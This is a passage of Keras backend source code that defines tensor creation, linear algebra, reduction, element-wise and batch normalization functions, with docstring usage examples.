>>> K.dtype(K.placeholder(shape=(2,4,5), dtype='float64'))
'float64'
# Keras variable
>>> kvar = K.variable(np.array([[1, 2], [3, 4]]))
>>> K.dtype(kvar)
'float32'
>>> kvar = K.variable(np.array([[1, 2], [3, 4]]), dtype='float32')
>>> K.dtype(kvar)
'float32'
```
"""
return x.dtype.base_dtype.name
@keras_export('keras.backend.eval')
def eval(x):
"""Evaluates the value of a variable.
Arguments:
x: A variable.
Returns:
A Numpy array.
Examples:
```python
>>> from keras import backend as K
>>> kvar = K.variable(np.array([[1, 2], [3, 4]]), dtype='float32')
>>> K.eval(kvar)
array([[ 1., 2.],
[ 3., 4.]], dtype=float32)
```
"""
return get_value(to_dense(x))
@keras_export('keras.backend.zeros')
def zeros(shape, dtype=None, name=None):
"""Instantiates an all-zeros variable and returns it.
Arguments:
shape: Tuple of integers, shape of returned Keras variable
dtype: String, data type of returned Keras variable
name: String, name of returned Keras variable
Returns:
A variable (including Keras metadata), filled with `0.0`.
Note that if `shape` was symbolic, we cannot return a variable,
and will return a dynamically-shaped tensor instead.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.zeros((3,4))
>>> K.eval(kvar)
array([[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.],
[ 0., 0., 0., 0.]], dtype=float32)
```
"""
with ops.init_scope():
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
v = array_ops.zeros(shape=shape, dtype=tf_dtype, name=name)
if py_all(v.shape.as_list()):
return variable(v, dtype=dtype, name=name)
track_variable(v)
return v
@keras_export('keras.backend.ones')
def ones(shape, dtype=None, name=None):
"""Instantiates an all-ones variable and returns it.
Arguments:
shape: Tuple of integers, shape of returned Keras variable.
dtype: String, data type of returned Keras variable.
name: String, name of returned Keras variable.
Returns:
A Keras variable, filled with `1.0`.
Note that if `shape` was symbolic, we cannot return a variable,
and will return a dynamically-shaped tensor instead.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.ones((3,4))
>>> K.eval(kvar)
array([[ 1., 1., 1., 1.],
[ 1., 1., 1., 1.],
[ 1., 1., 1., 1.]], dtype=float32)
```
"""
with ops.init_scope():
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
v = array_ops.ones(shape=shape, dtype=tf_dtype, name=name)
if py_all(v.shape.as_list()):
return variable(v, dtype=dtype, name=name)
track_variable(v)
return v
@keras_export('keras.backend.eye')
def eye(size, dtype=None, name=None):
"""Instantiate an identity matrix and returns it.
Arguments:
size: Integer, number of rows/columns.
dtype: String, data type of returned Keras variable.
name: String, name of returned Keras variable.
Returns:
A Keras variable, an identity matrix.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.eye(3)
>>> K.eval(kvar)
array([[ 1., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 1.]], dtype=float32)
```
"""
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
return variable(linalg_ops.eye(size, dtype=tf_dtype), dtype, name)
@keras_export('keras.backend.zeros_like')
def zeros_like(x, dtype=None, name=None):
"""Instantiates an all-zeros variable of the same shape as another tensor.
Arguments:
x: Keras variable or Keras tensor.
dtype: String, dtype of returned Keras variable.
None uses the dtype of x.
name: String, name for the variable to create.
Returns:
A Keras variable with the shape of x filled with zeros.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.variable(np.random.random((2,3)))
>>> kvar_zeros = K.zeros_like(kvar)
>>> K.eval(kvar_zeros)
array([[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
```
"""
return array_ops.zeros_like(x, dtype=dtype, name=name)
@keras_export('keras.backend.ones_like')
def ones_like(x, dtype=None, name=None):
"""Instantiates an all-ones variable of the same shape as another tensor.
Arguments:
x: Keras variable or tensor.
dtype: String, dtype of returned Keras variable.
None uses the dtype of x.
name: String, name for the variable to create.
Returns:
A Keras variable with the shape of x filled with ones.
Example:
```python
>>> from keras import backend as K
>>> kvar = K.variable(np.random.random((2,3)))
>>> kvar_ones = K.ones_like(kvar)
>>> K.eval(kvar_ones)
array([[ 1., 1., 1.],
[ 1., 1., 1.]], dtype=float32)
```
"""
return array_ops.ones_like(x, dtype=dtype, name=name)
def identity(x, name=None):
"""Returns a tensor with the same content as the input tensor.
Arguments:
x: The input tensor.
name: String, name for the variable to create.
Returns:
A tensor of the same shape, type and content.
"""
return array_ops.identity(x, name=name)
@keras_export('keras.backend.random_uniform_variable')
def random_uniform_variable(shape, low, high, dtype=None, name=None, seed=None):
"""Instantiates a variable with values drawn from a uniform distribution.
Arguments:
shape: Tuple of integers, shape of returned Keras variable.
low: Float, lower boundary of the output interval.
high: Float, upper boundary of the output interval.
dtype: String, dtype of returned Keras variable.
name: String, name of returned Keras variable.
seed: Integer, random seed.
Returns:
A Keras variable, filled with drawn samples.
Example:
```python
# TensorFlow example
>>> kvar = K.random_uniform_variable((2,3), 0, 1)
>>> kvar
<tensorflow.python.ops.variables.Variable object at 0x10ab40b10>
>>> K.eval(kvar)
array([[ 0.10940075, 0.10047495, 0.476143 ],
[ 0.66137183, 0.00869417, 0.89220798]], dtype=float32)
```
"""
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e8)
value = init_ops.random_uniform_initializer(
low, high, dtype=tf_dtype, seed=seed)(shape)
return variable(value, dtype=dtype, name=name)
@keras_export('keras.backend.random_normal_variable')
def random_normal_variable(shape, mean, scale, dtype=None, name=None,
seed=None):
"""Instantiates a variable with values drawn from a normal distribution.
Arguments:
shape: Tuple of integers, shape of returned Keras variable.
mean: Float, mean of the normal distribution.
scale: Float, standard deviation of the normal distribution.
dtype: String, dtype of returned Keras variable.
name: String, name of returned Keras variable.
seed: Integer, random seed.
Returns:
A Keras variable, filled with drawn samples.
Example:
```python
# TensorFlow example
>>> kvar = K.random_normal_variable((2,3), 0, 1)
>>> kvar
<tensorflow.python.ops.variables.Variable object at 0x10ab12dd0>
>>> K.eval(kvar)
array([[ 1.19591331, 0.68685907, -0.63814116],
[ 0.92629528, 0.28055015, 1.70484698]], dtype=float32)
```
"""
if dtype is None:
dtype = floatx()
tf_dtype = dtypes_module.as_dtype(dtype)
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e8)
value = init_ops.random_normal_initializer(
mean, scale, dtype=tf_dtype, seed=seed)(shape)
return variable(value, dtype=dtype, name=name)
@keras_export('keras.backend.count_params')
def count_params(x):
"""Returns the static number of elements in a variable or tensor.
Arguments:
x: Variable or tensor.
Returns:
Integer, the number of scalars in `x`.
Example:
```python
>>> kvar = K.zeros((2,3))
>>> K.count_params(kvar)
6
>>> K.eval(kvar)
array([[ 0., 0., 0.],
[ 0., 0., 0.]], dtype=float32)
```
"""
return np.prod(x.shape.as_list())
@keras_export('keras.backend.cast')
def cast(x, dtype):
"""Casts a tensor to a different dtype and returns it.
You can cast a Keras variable but it still returns a Keras tensor.
Arguments:
x: Keras tensor (or variable).
dtype: String, either (`'float16'`, `'float32'`, or `'float64'`).
Returns:
Keras tensor with dtype `dtype`.
Example:
```python
>>> from keras import backend as K
>>> input = K.placeholder((2, 3), dtype='float32')
>>> input
<tf.Tensor 'Placeholder_2:0' shape=(2, 3) dtype=float32>
# It doesn't work in-place as below.
>>> K.cast(input, dtype='float16')
<tf.Tensor 'Cast_1:0' shape=(2, 3) dtype=float16>
>>> input
<tf.Tensor 'Placeholder_2:0' shape=(2, 3) dtype=float32>
# you need to assign it.
>>> input = K.cast(input, dtype='float16')
>>> input
<tf.Tensor 'Cast_2:0' shape=(2, 3) dtype=float16>
```
"""
return math_ops.cast(x, dtype)
# UPDATES OPS
@keras_export('keras.backend.update')
def update(x, new_x):
return state_ops.assign(x, new_x)
@keras_export('keras.backend.update_add')
def update_add(x, increment):
"""Update the value of `x` by adding `increment`.
Arguments:
x: A Variable.
increment: A tensor of same shape as `x`.
Returns:
The variable `x` updated.
"""
return state_ops.assign_add(x, increment)
@keras_export('keras.backend.update_sub')
def update_sub(x, decrement):
"""Update the value of `x` by subtracting `decrement`.
Arguments:
x: A Variable.
decrement: A tensor of same shape as `x`.
Returns:
The variable `x` updated.
"""
return state_ops.assign_sub(x, decrement)
@keras_export('keras.backend.moving_average_update')
def moving_average_update(x, value, momentum):
"""Compute the moving average of a variable.
Arguments:
x: A Variable.
value: A tensor with the same shape as `variable`.
momentum: The moving average momentum.
Returns:
An Operation to update the variable.
"""
# `training` is higher-up than the Keras backend in the abstraction hierarchy.
# In particular, `training` depends on layers, and thus on Keras.
# moving_averages, being low-level ops, should not be part of the training
# module.
from tensorflow.python.training import moving_averages # pylint: disable=g-import-not-at-top
return moving_averages.assign_moving_average(
x, value, momentum, zero_debias=True)
# LINEAR ALGEBRA
@keras_export('keras.backend.dot')
def dot(x, y):
"""Multiplies 2 tensors (and/or variables) and returns a *tensor*.
When attempting to multiply a nD tensor
with a nD tensor, it reproduces the Theano behavior.
(e.g. `(2, 3) * (4, 3, 5) -> (2, 4, 5)`)
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A tensor, dot product of `x` and `y`.
Examples:
```python
# dot product between tensors
>>> x = K.placeholder(shape=(2, 3))
>>> y = K.placeholder(shape=(3, 4))
>>> xy = K.dot(x, y)
>>> xy
<tf.Tensor 'MatMul_9:0' shape=(2, 4) dtype=float32>
```
```python
# dot product between tensors
>>> x = K.placeholder(shape=(32, 28, 3))
>>> y = K.placeholder(shape=(3, 4))
>>> xy = K.dot(x, y)
>>> xy
<tf.Tensor 'MatMul_9:0' shape=(32, 28, 4) dtype=float32>
```
```python
# Theano-like behavior example
>>> x = K.random_uniform_variable(shape=(2, 3), low=0, high=1)
>>> y = K.ones((4, 3, 5))
>>> xy = K.dot(x, y)
>>> K.int_shape(xy)
(2, 4, 5)
```
"""
if ndim(x) is not None and (ndim(x) > 2 or ndim(y) > 2):
x_shape = []
for i, s in zip(int_shape(x), array_ops.unstack(array_ops.shape(x))):
if i is not None:
x_shape.append(i)
else:
x_shape.append(s)
x_shape = tuple(x_shape)
y_shape = []
for i, s in zip(int_shape(y), array_ops.unstack(array_ops.shape(y))):
if i is not None:
y_shape.append(i)
else:
y_shape.append(s)
y_shape = tuple(y_shape)
y_permute_dim = list(range(ndim(y)))
y_permute_dim = [y_permute_dim.pop(-2)] + y_permute_dim
xt = array_ops.reshape(x, [-1, x_shape[-1]])
yt = array_ops.reshape(
array_ops.transpose(y, perm=y_permute_dim), [y_shape[-2], -1])
return array_ops.reshape(
math_ops.matmul(xt, yt), x_shape[:-1] + y_shape[:-2] + y_shape[-1:])
if is_sparse(x):
out = sparse_ops.sparse_tensor_dense_matmul(x, y)
else:
out = math_ops.matmul(x, y)
return out
@keras_export('keras.backend.batch_dot')
def batch_dot(x, y, axes=None):
"""Batchwise dot product.
`batch_dot` is used to compute dot product of `x` and `y` when
`x` and `y` are data in batch, i.e. in a shape of
`(batch_size, :)`.
`batch_dot` results in a tensor or variable with less dimensions
than the input. If the number of dimensions is reduced to 1,
we use `expand_dims` to make sure that ndim is at least 2.
Arguments:
x: Keras tensor or variable with `ndim >= 2`.
y: Keras tensor or variable with `ndim >= 2`.
axes: list of (or single) int with target dimensions.
The lengths of `axes[0]` and `axes[1]` should be the same.
Returns:
A tensor with shape equal to the concatenation of `x`'s shape
(less the dimension that was summed over) and `y`'s shape
(less the batch dimension and the dimension that was summed over).
If the final rank is 1, we reshape it to `(batch_size, 1)`.
Examples:
Assume `x = [[1, 2], [3, 4]]` and `y = [[5, 6], [7, 8]]`
`batch_dot(x, y, axes=1) = [[17, 53]]` which is the main diagonal
of `x.dot(y.T)`, although we never have to calculate the off-diagonal
elements.
Shape inference:
Let `x`'s shape be `(100, 20)` and `y`'s shape be `(100, 30, 20)`.
If `axes` is (1, 2), to find the output shape of resultant tensor,
loop through each dimension in `x`'s shape and `y`'s shape:
* `x.shape[0]` : 100 : append to output shape
* `x.shape[1]` : 20 : do not append to output shape,
dimension 1 of `x` has been summed over. (`dot_axes[0]` = 1)
* `y.shape[0]` : 100 : do not append to output shape,
always ignore first dimension of `y`
* `y.shape[1]` : 30 : append to output shape
* `y.shape[2]` : 20 : do not append to output shape,
dimension 2 of `y` has been summed over. (`dot_axes[1]` = 2)
`output_shape` = `(100, 30)`
```python
>>> x_batch = K.ones(shape=(32, 20, 1))
>>> y_batch = K.ones(shape=(32, 30, 20))
>>> xy_batch_dot = K.batch_dot(x_batch, y_batch, axes=[1, 2])
>>> K.int_shape(xy_batch_dot)
(32, 1, 30)
```
"""
if isinstance(axes, int):
axes = (axes, axes)
x_ndim = ndim(x)
y_ndim = ndim(y)
if axes is None:
# behaves like tf.batch_matmul as default
axes = [x_ndim - 1, y_ndim - 2]
if x_ndim > y_ndim:
diff = x_ndim - y_ndim
y = array_ops.reshape(y,
array_ops.concat(
[array_ops.shape(y), [1] * (diff)], axis=0))
elif y_ndim > x_ndim:
diff = y_ndim - x_ndim
x = array_ops.reshape(x,
array_ops.concat(
[array_ops.shape(x), [1] * (diff)], axis=0))
else:
diff = 0
if ndim(x) == 2 and ndim(y) == 2:
if axes[0] == axes[1]:
out = math_ops.reduce_sum(math_ops.multiply(x, y), axes[0])
else:
out = math_ops.reduce_sum(
math_ops.multiply(array_ops.transpose(x, [1, 0]), y), axes[1])
else:
adj_x = None if axes[0] == ndim(x) - 1 else True
adj_y = True if axes[1] == ndim(y) - 1 else None
out = math_ops.matmul(x, y, adjoint_a=adj_x, adjoint_b=adj_y)
if diff:
if x_ndim > y_ndim:
idx = x_ndim + y_ndim - 3
else:
idx = x_ndim - 1
out = array_ops.squeeze(out, list(range(idx, idx + diff)))
if ndim(out) == 1:
out = expand_dims(out, 1)
return out
@keras_export('keras.backend.transpose')
def transpose(x):
"""Transposes a tensor and returns it.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
Examples:
```python
>>> var = K.variable([[1, 2, 3], [4, 5, 6]])
>>> K.eval(var)
array([[ 1., 2., 3.],
[ 4., 5., 6.]], dtype=float32)
>>> var_transposed = K.transpose(var)
>>> K.eval(var_transposed)
array([[ 1., 4.],
[ 2., 5.],
[ 3., 6.]], dtype=float32)
```
```python
>>> input = K.placeholder((2, 3))
>>> input
<tf.Tensor 'Placeholder_11:0' shape=(2, 3) dtype=float32>
>>> input_transposed = K.transpose(input)
>>> input_transposed
<tf.Tensor 'transpose_4:0' shape=(3, 2) dtype=float32>
```
"""
return array_ops.transpose(x)
@keras_export('keras.backend.gather')
def gather(reference, indices):
"""Retrieves the elements of indices `indices` in the tensor `reference`.
Arguments:
reference: A tensor.
indices: An integer tensor of indices.
Returns:
A tensor of same type as `reference`.
"""
return array_ops.gather(reference, indices)
# ELEMENT-WISE OPERATIONS
@keras_export('keras.backend.max')
def max(x, axis=None, keepdims=False):
"""Maximum value in a tensor.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to find maximum values.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with maximum values of `x`.
"""
return math_ops.reduce_max(x, axis, keepdims)
@keras_export('keras.backend.min')
def min(x, axis=None, keepdims=False):
"""Minimum value in a tensor.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to find minimum values.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with minimum values of `x`.
"""
return math_ops.reduce_min(x, axis, keepdims)
@keras_export('keras.backend.sum')
def sum(x, axis=None, keepdims=False):
"""Sum of the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to sum over.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with sum of `x`.
"""
return math_ops.reduce_sum(x, axis, keepdims)
@keras_export('keras.backend.prod')
def prod(x, axis=None, keepdims=False):
"""Multiplies the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the product.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with the product of elements of `x`.
"""
return math_ops.reduce_prod(x, axis, keepdims)
@keras_export('keras.backend.cumsum')
def cumsum(x, axis=0):
"""Cumulative sum of the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the sum.
Returns:
A tensor of the cumulative sum of values of `x` along `axis`.
"""
return math_ops.cumsum(x, axis=axis)
@keras_export('keras.backend.cumprod')
def cumprod(x, axis=0):
"""Cumulative product of the values in a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the product.
Returns:
A tensor of the cumulative product of values of `x` along `axis`.
"""
return math_ops.cumprod(x, axis=axis)
@keras_export('keras.backend.var')
def var(x, axis=None, keepdims=False):
"""Variance of a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the variance.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with the variance of elements of `x`.
"""
if x.dtype.base_dtype == dtypes_module.bool:
x = math_ops.cast(x, floatx())
return math_ops.reduce_variance(x, axis=axis, keepdims=keepdims)
@keras_export('keras.backend.std')
def std(x, axis=None, keepdims=False):
"""Standard deviation of a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to compute the standard deviation.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns:
A tensor with the standard deviation of elements of `x`.
"""
if x.dtype.base_dtype == dtypes_module.bool:
x = math_ops.cast(x, floatx())
return math_ops.reduce_std(x, axis=axis, keepdims=keepdims)
@keras_export('keras.backend.mean')
def mean(x, axis=None, keepdims=False):
"""Mean of a tensor, alongside the specified axis.
Arguments:
x: A tensor or variable.
axis: A list of integer. Axes to compute the mean.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1 for each entry in `axis`. If `keepdims` is `True`,
the reduced dimensions are retained with length 1.
Returns:
A tensor with the mean of elements of `x`.
"""
if x.dtype.base_dtype == dtypes_module.bool:
x = math_ops.cast(x, floatx())
return math_ops.reduce_mean(x, axis, keepdims)
@keras_export('keras.backend.any')
def any(x, axis=None, keepdims=False):
"""Bitwise reduction (logical OR).
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
keepdims: whether the drop or broadcast the reduction axes.
Returns:
A uint8 tensor (0s and 1s).
"""
x = math_ops.cast(x, dtypes_module.bool)
return math_ops.reduce_any(x, axis, keepdims)
@keras_export('keras.backend.all')
def all(x, axis=None, keepdims=False):
"""Bitwise reduction (logical AND).
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
keepdims: whether the drop or broadcast the reduction axes.
Returns:
A uint8 tensor (0s and 1s).
"""
x = math_ops.cast(x, dtypes_module.bool)
return math_ops.reduce_all(x, axis, keepdims)
@keras_export('keras.backend.argmax')
def argmax(x, axis=-1):
"""Returns the index of the maximum value along an axis.
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
Returns:
A tensor.
"""
return math_ops.argmax(x, axis)
@keras_export('keras.backend.argmin')
def argmin(x, axis=-1):
"""Returns the index of the minimum value along an axis.
Arguments:
x: Tensor or variable.
axis: axis along which to perform the reduction.
Returns:
A tensor.
"""
return math_ops.argmin(x, axis)
@keras_export('keras.backend.square')
def square(x):
"""Element-wise square.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.square(x)
@keras_export('keras.backend.abs')
def abs(x):
"""Element-wise absolute value.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.abs(x)
@keras_export('keras.backend.sqrt')
def sqrt(x):
"""Element-wise square root.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
zero = _constant_to_tensor(0., x.dtype.base_dtype)
inf = _constant_to_tensor(np.inf, x.dtype.base_dtype)
x = clip_ops.clip_by_value(x, zero, inf)
return math_ops.sqrt(x)
@keras_export('keras.backend.exp')
def exp(x):
"""Element-wise exponential.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.exp(x)
@keras_export('keras.backend.log')
def log(x):
"""Element-wise log.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.log(x)
def logsumexp(x, axis=None, keepdims=False):
"""Computes log(sum(exp(elements across dimensions of a tensor))).
This function is more numerically stable than log(sum(exp(x))).
It avoids overflows caused by taking the exp of large inputs and
underflows caused by taking the log of small inputs.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to reduce over.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`, the reduced dimension is
retained with length 1.
Returns:
The reduced tensor.
"""
return math_ops.reduce_logsumexp(x, axis, keepdims)
@keras_export('keras.backend.round')
def round(x):
"""Element-wise rounding to the closest integer.
In case of tie, the rounding mode used is "half to even".
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.round(x)
@keras_export('keras.backend.sign')
def sign(x):
"""Element-wise sign.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.sign(x)
@keras_export('keras.backend.pow')
def pow(x, a):
"""Element-wise exponentiation.
Arguments:
x: Tensor or variable.
a: Python integer.
Returns:
A tensor.
"""
return math_ops.pow(x, a)
@keras_export('keras.backend.clip')
def clip(x, min_value, max_value):
"""Element-wise value clipping.
Arguments:
x: Tensor or variable.
min_value: Python float or integer.
max_value: Python float or integer.
Returns:
A tensor.
"""
if max_value is not None and max_value < min_value:
max_value = min_value
if max_value is None:
max_value = np.inf
min_value = _constant_to_tensor(min_value, x.dtype.base_dtype)
max_value = _constant_to_tensor(max_value, x.dtype.base_dtype)
return clip_ops.clip_by_value(x, min_value, max_value)
@keras_export('keras.backend.equal')
def equal(x, y):
"""Element-wise equality between two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.equal(x, y)
@keras_export('keras.backend.not_equal')
def not_equal(x, y):
"""Element-wise inequality between two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.not_equal(x, y)
@keras_export('keras.backend.greater')
def greater(x, y):
"""Element-wise truth value of (x > y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.greater(x, y)
@keras_export('keras.backend.greater_equal')
def greater_equal(x, y):
"""Element-wise truth value of (x >= y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.greater_equal(x, y)
@keras_export('keras.backend.less')
def less(x, y):
"""Element-wise truth value of (x < y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.less(x, y)
@keras_export('keras.backend.less_equal')
def less_equal(x, y):
"""Element-wise truth value of (x <= y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.less_equal(x, y)
@keras_export('keras.backend.maximum')
def maximum(x, y):
"""Element-wise maximum of two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.maximum(x, y)
@keras_export('keras.backend.minimum')
def minimum(x, y):
"""Element-wise minimum of two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.minimum(x, y)
@keras_export('keras.backend.sin')
def sin(x):
"""Computes sin of x element-wise.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.sin(x)
@keras_export('keras.backend.cos')
def cos(x):
"""Computes cos of x element-wise.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.cos(x)
def _regular_normalize_batch_in_training(x,
gamma,
beta,
reduction_axes,
epsilon=1e-3):
"""Non-fused version of `normalize_batch_in_training`.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
mean, var = nn.moments(x, reduction_axes, None, None, False)
normed = nn.batch_normalization(x, mean, var, beta, gamma, epsilon)
return normed, mean, var
def _broadcast_normalize_batch_in_training(x,
gamma,
beta,
reduction_axes,
epsilon=1e-3):
"""Non-fused, broadcast version of `normalize_batch_in_training`.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
mean, var = nn.moments(x, reduction_axes, None, None, False)
target_shape = []
for axis in range(ndim(x)):
if axis in reduction_axes:
target_shape.append(1)
else:
target_shape.append(array_ops.shape(x)[axis])
target_shape = array_ops.stack(target_shape)
broadcast_mean = array_ops.reshape(mean, target_shape)
broadcast_var = array_ops.reshape(var, target_shape)
if gamma is None:
broadcast_gamma = None
else:
broadcast_gamma = array_ops.reshape(gamma, target_shape)
if beta is None:
broadcast_beta = None
else:
broadcast_beta = array_ops.reshape(beta, target_shape)
normed = nn.batch_normalization(x, broadcast_mean, broadcast_var,
broadcast_beta, broadcast_gamma, epsilon)
return normed, mean, var
def _fused_normalize_batch_in_training(x,
gamma,
beta,
reduction_axes,
epsilon=1e-3):
"""Fused version of `normalize_batch_in_training`.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
if list(reduction_axes) == [0, 1, 2]:
normalization_axis = 3
tf_data_format = 'NHWC'
else:
normalization_axis = 1
tf_data_format = 'NCHW'
if gamma is None:
gamma = constant_op.constant(
1.0, dtype=x.dtype, shape=[x.shape[normalization_axis]])
if beta is None:
beta = constant_op.constant(
0.0, dtype=x.dtype, shape=[x.shape[normalization_axis]])
return nn.fused_batch_norm(
x, gamma, beta, epsilon=epsilon, data_format=tf_data_format)
@keras_export('keras.backend.normalize_batch_in_training')
def normalize_batch_in_training(x, gamma, beta, reduction_axes, epsilon=1e-3):
"""Computes mean and std for batch then apply batch_normalization on batch.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
if ndim(x) == 4 and list(reduction_axes) in [[0, 1, 2], [0, 2, 3]]:
if not _has_nchw_support() and list(reduction_axes) == [0, 2, 3]:
return _broadcast_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
return _fused_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
else:
if sorted(reduction_axes) == list(range(ndim(x)))[:-1]:
return _regular_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
else:
return _broadcast_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
@keras_export('keras.backend.batch_normalization')
def batch_normalization(x, mean, var, beta, gamma, axis=-1, epsilon=1e-3):
"""Applies batch normalization on x given mean, var, beta and gamma.
I.e. returns:
`output = (x - mean) / (sqrt(var) + epsilon) * gamma + beta`
Arguments:
x: Input tensor or variable.
mean: Mean of batch.
var: Variance of batch.
beta: Tensor with which to center the input.
gamma: Tensor by which to scale the input.
axis: Integer, the axis that should be normalized.
(typically the features axis).
epsilon: Fuzz factor.
Returns:
A tensor.
"""
if ndim(x) == 4:
# The CPU implementation of `fused_batch_norm` only supports NHWC
if axis == 1 or axis == -3:
tf_data_format = 'NCHW'
elif axis == 3 or axis == -1:
tf_data_format = 'NHWC'
else:
tf_data_format = None
if (tf_data_format == 'NHWC' or
tf_data_format == 'NCHW' and _has_nchw_support()):
# The mean / var / beta / gamma tensors may be broadcasted
# so they may have extra axes of size 1, which should be squeezed.
if ndim(mean) > 1:
mean = array_ops.reshape(mean, [-1])
if ndim(var) > 1:
var = array_ops.reshape(var, [-1])
if beta is None:
beta = zeros_like(mean)
elif ndim(beta) > 1:
beta = array_ops.reshape(beta, [-1])
if gamma is None:
gamma = ones_like(mean)
elif ndim(gamma) > 1:
gamma = array_ops.reshape(gamma, [-1])
y, _, _ = nn.fused_batch_norm(
x,
gamma,
beta,
epsilon=epsilon,
mean=mean,
variance=var,
data_format=tf_data_format,
is_training=False
)
return y
return nn.batch_normalization(x, mean, var, beta, gamma, epsilon)
# SHAPE OPERATIONS
@keras_export('keras.backend.concatenate')
def concatenate(tensors, axis=-1):
"""Concatenates a list of tensors alongside the specified axis.
Arguments:
tensors: list of tensors to concatenate.
axis: concatenation axis.
Returns:
A tensor.
"""
if axis < 0:
rank = ndim(tensors[0])
if rank:
axis %= rank
else:
axis = 0
if py_all(is_sparse(x) for x in tensors):
return sparse_ops.sparse_concat(axis, tensors)
else:
return array_ops.concat([to_dense(x) for x in tensors], axis)
@keras_export('keras.backend.reshape')
def reshape(x, shape):
"""Reshapes a tensor to the specified shape.
Arguments:
x: Tensor or variable.
